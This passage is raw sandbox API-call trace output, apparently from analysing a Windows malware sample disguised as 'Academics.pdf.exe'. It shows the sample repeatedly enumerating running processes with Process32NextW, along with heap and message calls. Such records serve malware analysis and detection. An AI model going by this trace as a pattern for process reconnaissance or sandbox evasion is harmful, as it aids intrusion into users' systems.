lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.805] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0289.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.813] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.816] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.817] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.818] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.819] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0289.820] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.821] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0289.822] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0289.822] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0289.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0289.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0289.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0289.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0289.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0289.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0289.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0289.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0289.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0289.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0289.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0289.833] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0289.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0289.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0289.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0289.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0289.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0289.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0289.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0289.854] CloseHandle (hObject=0x294) returned 1 [0289.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0289.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0289.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0289.854] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0289.854] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0289.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.855] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0289.857] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.863] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0289.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0289.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0289.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0289.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0289.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0289.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0289.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0289.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0289.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0289.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0289.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0289.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0289.886] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 